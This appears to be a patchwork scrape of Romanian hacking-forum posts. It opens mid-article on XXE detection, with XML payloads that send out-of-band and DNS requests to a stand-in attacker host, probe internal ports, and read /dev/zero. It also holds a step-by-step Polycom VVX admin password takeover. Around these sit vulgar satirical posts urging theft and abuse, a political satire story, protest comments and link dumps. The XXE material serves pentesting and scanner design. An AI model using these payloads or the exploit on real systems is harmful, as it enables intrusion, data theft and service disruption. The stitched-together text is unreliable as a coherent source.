payload like the following (still having the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests that should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where (at the end of the pentesting assignment) the observed webserver logs (of the attacker's webserver) can be given to the scanning engine for checking against the issued OOB request numbers for matches. If the steps above didn't trigger an XXE condition (eventually because the server cannot access the attacker's webserver), try to use established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, like in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM"http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution to the attacker's domain via its DNS server might be used to trigger the XXE match when after the pentest the logs of the DNS server are parsed by the scanner to correlate them with the scanned requests. If the steps above didn't trigger an XXE condition, we have to go completely blind only on sidechannels like timing measurements: This could be done by checking various internally reachable ports while measuring the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> versus the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:9876" > %xxe; ]> Similar checks can be performed with file:/// URLs by accessing small vs. big files. When being a risky scanner, you can try to measure the increase in response time when accessing /dev/zero as the file (eventually killing the thread on the server). Also a risky scanner can try to measure the processing time of nested (non-external) expansions like in the "billion laughs attack". Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique on requests even when they haven't used any XML during passive observations. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or alike also offer to be accessed using XML, as is the case with some RESTful development frameworks. Some of the XML DTD payloads above (those using the OOB requests to detect XXE either by inspecting the attacker's webserver logs or measuring the timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence to the XXE finding, since the shorter version only validates that external DTDs and not entities can be loaded. Conclusion As a Pentester Watch out for any service-like endpoints in the application to pentest and try to force them to accept XML, even when the usage of these endpoints from within the application utilizes other kinds of input formats (like query- or path-params or JSON post bodies). In a lucky case where the endpoint is also configured to accept XML, try to further exploit this as an XXE condition. As a Scanner Vendor Try to incorporate ideas like the steps presented in this article into your scanning engines augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable). Source :

http://thehackernews.tradepub.com/free/w_wile229/prgm.cgi?a=1 https://mega.nz/#!w1twHIYK!vCxN4nTn8To-3SrIr8QozVBWX6J3qkQaeskWHE7EvMs

https://dribbble.com/shots/1400468-Fox

Tine-o tot asa Alezu!

Ceva funny: si hai la protest !

http://prntscr.com/e3yjro

Pentru cei care nu inteleg: https://www.facebook.com/ioana.chitu.5/videos/10154591999362912/ Ceva amuzant: https://www.facebook.com/viceromania/videos/1462295087128108/?hc_ref=NEWSFEED

- Daca vezi un om ca arunca mizeria la cos, baga-i pula in gura si injura-l pe nenorocit, cum isi permite sa fie civilizat - Daca iti vezi vecinul muncind, nu te lua dupa fraier. Nu e un motiv sa faci ca el - Munca l-a facut pe om, dar nici lenea nu l-a omorat - Pandeste fiecare fraier la semafor si claxoneaza-l. Deschide repede geamul si baga-i pula in gura. Ce cauta pe strada? Sa stea in ma-sa acasa. - Mergi pe strada si asculta florin salam pe telefon in timp ce te scarpini la pula - Scuipa, mananca seminte prin mijloacele de transport in comun, da-i in ma-sa pe ceilalti. - Insala pe toata lumea, fura papornitele pensionarelor pe strada. Da-i in mortu lor pe toti. Banu se face pe mangleala. - Fura capacele canalelor si vinde-le. Sunt de fonta si faci bani frumosi cu ele. Si da, politicienii sunt vinovati pentru asta. Fii roman adevarat. Prin natura noastra suntem hoti, curve, spagari si nesimtiti. Nu lasa strainii sa ne fure obiceiurile si traditia. Ai postat mizeria asta la tutoriale. Da ce cacat crezi ca e ma aici ? Forum de smenari?

(Via Liviu Iancu - genial textul!) Ca să pună gheara pe pământurile și casa dărăpănată a Maricicăi, proasta satului, Vasile a trebuit s-o ia cu acte. Fost secretar de partid pe vremea lui Ceaușescu, Vasile avea vorbele la el și nu i-a fost greu s-o momească pe femeie cu câte-n lună și-n stele. I s-au îngălbenit dinții și i-a încărunțit mustața de atâtea și-atâtea vorbe dulci pe care i le-a înșirat seara târziu, tolănit picior peste picior pe băncuța șubredă din fața porții ei. I-a promis că o să-i cumpere rochii și pantofi, că o să-i asfalteze drumul din poartă și până în uliță, că o să-i plătească lu' tac-so spitalizarea și c-o să pună o vorbă undeva, unde știe el, ca să-i dubleze pensia mă-sii. I-a mai zis că va repara gardul, iar în locul veceului prăpădit din fundul curții îi va ridica un bloc care să se învârtă după soare. Maricica îl asculta fascinată din buzele porții și se mira cum în capul lui mic puteau să se aglomereze sute de idei deștepte, ca oile în staul. Spre seară, înainte să plece, Vasile o lua în brațe și îi șoptea zâmbind pe sub mustață că are pentru ea ceva uriaș, ce crește cu 5% în fiecare an. Maricica îl respingea neconvingător, cu podul palmei, și chicotea cu cealaltă mână la gură, ca Dan Diaconescu. Băiat de la țară, fără prea multă școală, Vasile părea de 1.000 de ori mai descurcăreț decât Niky, agronomul cu studii la Bruxelles. Niky îi bătea și el în poartă, dar în miezul zilei, însă era timid și nu-i promitea niciodată nimic. Ba dimpotrivă, de parcă ar fi vrut s-o convingă să nu-l ia de bărbat. Zicea că n-o să aibă o viață ușoară dacă se mărită cu el, însă în timp și cu multă muncă, cu studiile lui și pământurile ei, vor trăi ceva mai bine. Era clar că Niky n-avea papagal, deși uneori, când ridica ochii din pământ, o privea fix, de parcă ar fi vrut să-i spună mai multe. - Știi... Vasile nu e un tip serios. N-o să se țină de promisiuni, șoptea el, dar nu îndrăznea să zică mai mult. Mă-sa, femeie cu riduri cât degetul, trecută prin viață, își făcea cruce când o asculta pe fată: - Ce bărbat e ăla, Maricico, de vrea să te convingă cu ce nu poate "celălant". Să-ți spuie mai bine ce poate el să facă pentru tine! Avea dreptate bătrâna. Niky era moale ca basmaua. Ce bărbat e ăla care nu te proptește în stâlpul porții și nu-ți cotrobăie pe sub fustă? Ce să faci cu un mototol care nu știe nici măcar să promită? Și nici dușmanul nu știe să și-l bârfească așa cum trebuie. Păi să fi auzit ce era la gura lui Vasile când vorbea despre el! - Cum Dumnezeu, Maricico, să-ți dai tu pământu' moștenit de la tac-to mare, care a luptat în războaie cu turcii, tătarii și barbarii unuia care nici măcar nume românesc nu are? Ce e aia <<Niky>>? Nu putea să-i zică și mă-sa Nicu? Maricica îi dădea dreptate și râdea mărunt, până când în jurul nasului îi înfloreau balonașe mici de muci. Se simțea bine cu Vasile și avea încredere în el. Îi plăceau promisiunile lui și simțea că lângă el o să ajungă într-un an, din fata simplă cu basma ruptă, care mulge vaca și are grijă de porci, o boieroaică bengoasă. Se și vedea răsturnată cu cracii-n sus pe pereți, ascultând Taraf TV și numărând banii care se vor înmulți ca șobolanii. Pe la începutul lui decembrie au făcut nunta și l-a luat de bărbat. Vasile s-a instalat în casa ei și așa a trecut o săptămână. Nu i-a reparat gardul și nici nu i-a asfaltat drumul. I-a spus că pentru rochii și pantofi trebuie să aștepte până la anu', când o face rost de bani. "Alte lucruri sunt mai urgente, Maricico, dar asta nu e treabă pe care s-o discut cu femeia", a asigurat-o el. Peste câteva zile i-a bătut la ușă un vecin: Cătălin, un nene cărunt și cu figură de bivol constipat, pe care-l știa tot satul că ținuse șase neveste și toate îl părăsiseră. La 60 de ani, când alții ies la pensie, el s-a însurat a șaptea oară. Popa îi șoptise atunci la ureche, în biserică: "Bre, nea Cătăline, nu trebuie să le iei pe toate de nevastă ca să le convingi să bage milogu-n traistă! Merge și fără acte!". Vasile s-a închis cu el în camera de la drum și au discutat până în zori. Maricica l-a tot așteptat cu ciorba rece pe masă, dar degeaba. Când și-a vârât capul pe ușă, mai spre miezul nopții, Vasile a repezit-o: - Du-te, fă proasto, și te culcă! Nu vezi că discutăm probleme importante? Maricica s-a perpelit în pat vreo oră, dar a adormit fericită, cu gândul că bărbatul ei a ajuns mare, dacă vine un barosan despre care se spune că e al doilea om în sat și se sfătuiește cu el în miez de noapte. A doua zi, Vasile s-a închis din nou în camera de oaspeți, doar că pe lângă bătrânelul însurățel au mai venit și alții, cu cefe groase, cercei în urechi și sirene tatuate pe braț. Maricica l-a recunoscut printre ei pe fratele unui borfaș care îi furase anul trecut rațele și intrase la bulău. Mai era acolo și un tinerel al cărui tată fusese arestat pentru că violase două babe din sat. Discuția se aprinsese și Maricica mai auzea din când în când frânturi de frază: "se chinuie în pușcării", "șobolani", "gândaci", "să-i ajutăm", "e urgent". - Ce faci, Vasile, ne bagi toți hoții...?, s-a plâns de dimineață Maricica, dar nici n-a apucat să termine fraza, că palma grea a bărbatului i s-a lipit de basma. A urmat o săptămână în care casa i s-a umplut cu rude de hoți, criminali, violatori și politicieni corupți. Vasile parcă turbase. Făcea planuri peste planuri. Își mușca mustața, iar ochii îi scăpărau plini de ură, ca la pisicile sălbatice. - Vasile, ce mi-ai promis tu mie, ca să te iau? Vasile scrâșnea din dinți și îi mai bascula un capac peste față. Cu ochii vineți și nasul umflat, femeia ajunsese de râsul vecinilor. - Lasă-l, Maricico, dă-l dracu' de penal, nu vezi că te bate? Maricica își fornăia mucii și-și trăgea basmaua pe frunte, ca să-și acopere ochii vineți și umflați. - Ei, era și el nervos... , îl scuza ea. - Dar nu vezi că te-a momit cu luna de pe cer și nu ți-a dat nimic? Nu vezi că tot în fundul curții te caci și tot cu ligheanul între picioare te speli? Ție îți place că în loc să-i ajute pe mă-ta și pe tac-to, să-ți asfalteze ulița și să-ți repare gardul, ți-a umplut casa de hoți? - Și ce să fac, tanti? Ce să fac? - Să-l dai dracu' afară din casă, Maricico. S-o iei pe mă-ta, pe tac-to și pe verii tăi de peste gârlă și să-i spuneți că ori termină cu pușcăriașii și se ține de ce ți-a promis, ori pleacă din casa ta. - Nu pot, tanti, că l-am ales acum o lună. A fost cu nuntă, cu dar, cu lăutari... - Și ce, fă, dacă ai fost proastă și l-ai ales, acum îl lași să-ți facă ce vrea el? Dacă ți se cacă în pat în fiecare dimineață, tu taci și nu zici nimic, pentru că l-ai ales acum o lună? Sătul de ceartă, Vasile a luat-o deoparte și i-a explicat cum stau lucrurile. El și prietenii lui voiau să forțeze închisoarea de la marginea comunei și să le dea drumul celor care zăceau închiși acolo fie pe nedrept, fie pentru niște găinării mici. Zicea că se cheltuiesc bani mulți cu ei și că, după ce li se dă drumul, banii ăia o să se împartă la oameni. O să se dea pensii, salarii și burse la studenți din ei, se vor repara străzi și se vor vopsi gardurile. Ăia din pușcării, odată eliberați, vor deveni brusc oameni cumsecade și nu vor mai fura, viola sau tâlhări. - Astea sunt problemele importante ale comunei, Maricico, ascultă-mă pe mine. Maricica l-a crezut, că doar ea, de bună voie și nesilită de nimeni, îl alesese pe omul ăsta cu o lună în urmă. S-a așezat în fund, pe marginea șanțului, și prin găurile din gard, mari cât dovleacu', a văzut veceul de lemn putred din fundul curții, aplecat într-o rână, ca un bețiv ce se sprijină de un zid. Acolo, în locul lui, Vasile îi promisese că va ridica un bloc frumos, cu încălzire centrală și apă la chiuvetă. Apoi, îi spusese el, va asfalta șanțul și va lăsa doar un firicel limpede de apă, unde se vor bălăci pești grași și colorați. Ei doi se vor muta în tot blocul ăla, iar pe un etaj întreg va fi baia, cu duș, piscină, veceu cu colac, săpun, periuțe de dinți și creme cu care să te ungi din cap până-n picioare. Maricica s-a mirat cât de frumos se țes toate planurile și, visând deja la vremurile bune care o așteaptă, s-a gândit cu milă la bieții oameni din pușcării, care o duc ca vai de mama lor. Și de-acolo, din șanțul plin de noroi, s-a întrebat pentru prima dată în viața ei dacă nu cumva din invidie vecinii o porecliseră proasta satului.

Cacat! Am uitat sa trec prin Tor PS: M-am uitat pe cateva filmari, se vad multe fete, dar NU recunosc pe nimeni din PCH (Peluza Catalin Hildan), desi din vedere ii stiu pe multi dintre ei.

Rog Biserica sa modifice porunca numarul 8: in

Mi-a dat Soros mail si cica ne trimite banii in Bitcoin.

Vreau să spun că prostestul în primul rând este o mişcare politică în opinia mea, apoi a degenerat puţin datorită influenţei trădătorilor, corupţilor, serviciului de informaţii şi unor grupuri de manipulatori care pun paie pe foc. Eu şi alţii suntem provocaţi pentru a se crea haos mai mare ... chiar de servicii, oameni din MAI de asemenea au informaţii despre acest lucru. Sunt mulţi oameni monitorizaţi fără motiv şi provocaţi, mă abţin să nu le fac jocul, cred că în ţară sunt oameni inteligenţi ce au înţeles situaţia şi nu vor face jocul unor trădători, hoţi, corupţi, santajişti şi serviciilor secrete străine. Oricum se pun baie pe foc chiar din interiorul MAI, SRI, SIE. Habar nu am ce este în mintea lor limitată, vor să bage ţara într-un război civil şi alţii ca mine să fie provocaţi pentru a o băgă (într-un mod inteligent) pe plan extern? Se lucrează împotriva intereselor naţionale şi siguranţei naţionale chiar din interior. Cred că realizează că dacă se răspundea la fel de agresiv azi noapte, mureau câţiva şi începea ceva se dorea apoi nu doar alt guvern ci şi demiterea preşedintelui ş.a.m.d.

# Exploit Title: Polycom VVX Web Interface - Change Admin Password as User # Date: January 26, 2017 # Exploit Author: Mike Brown # Vendor Homepage: http://www.polycom.com/ # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436 # CVE : N/A # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface. # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses # and account information. 1. Login with the "User" Account. 2. Navigate to Settings > Change Password. 3. Fill in "Old Password" with the current "User" password. 4. Fill in "New Password" with the new "Admin" account password, and confirm. 5. Using a live HTML editor, inspect the old password field. you will see: <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password"> 6. Change the name field to "120" 7. Click "Save" 8. An error will be shown on screen but you can now log into the Admin account with the new password.

http://bestpsdschool.com/modern-portfolio-layout-design/

1.200 de cursuri online gratuite provenite din cadrul universităților de renume mondial, pentru a te ajuta în dezvoltarea pasiunii pentru care vrei să profesezi. http://www.openculture.com/freeonlinecourses

Video Preview Introduction Secure C 101 Secure C 102 Secure C 103 Code Auditing Linux & Permissions Spectrum Windows Overview Rootkits Reverse Engineering 101 Reverse Engineering 102 Fuzzing 101 Midterm Review Fuzzing 102 Exploitation 101 Exploitation 102 Exploitation 103 Networking 101 Networking 102 Web Exploitation 101 Web Exploitation 102 Web Exploitation 103 Exploitation 104 Exploitation 105 Exam 2 Review Exploitation 106 History of Exploitation Exploitation 107 Social Engineering & Physical Security Digital Forensics & Incident Response Tying All The Things Together http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html

Pana pe 31.12.2016 la orice creatie ofer gratuit cover pentru facebook!

Iti faci cont pe cloudflare, pui link-ul site-ului in cauza, o sa iti dea 2 nameservere. Acum ca ai cele doua nameservere, te duci frumos pe site-ul unde ai cumparat domeniul si pui nameserverele primite de la cloudflare. Done! Astepti propagarea nameserverelor. Pentru mai multe detalii sau sfaturi poti sa imi dai un pm

Confirm, nici la mine nu merge !